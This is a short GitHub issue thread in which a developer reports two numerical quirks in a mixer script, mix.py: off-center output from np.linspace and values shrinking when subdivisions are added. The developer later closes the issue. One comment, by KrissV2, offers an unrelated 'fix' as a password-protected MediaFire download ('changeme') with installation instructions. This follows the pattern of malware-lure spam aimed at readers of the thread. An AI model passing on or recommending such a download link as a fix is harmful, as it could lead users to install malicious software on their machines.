### ISSUE TITLE
mix.py Has Some Quirks.

### ISSUE THREAD

**Issue by jordanhenshaw** [Alva-Theaters/Sorcerer#53]
1. The mixer's output values aren't centered. Consistently, a symmetrical input results in a slightly asymmetrical output. Couldn't figure out how to solve this today with my limited knowledge of numpy. I was able to fix it by setting endpoint to True in the np.linspace function call, but that caused a much more severe wrapping problem where it wouldn't differentiate the starting channel from the end channel, they became linked. So I reverted that back to False.

2. Whenever you add subdivisions, it decreases the overall values across the board. It shouldn't.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jordanhenshaw** [comment]
Going to close for now, will probably rewrite the mixer later down the road but not right now. It's works well enough at the moment.
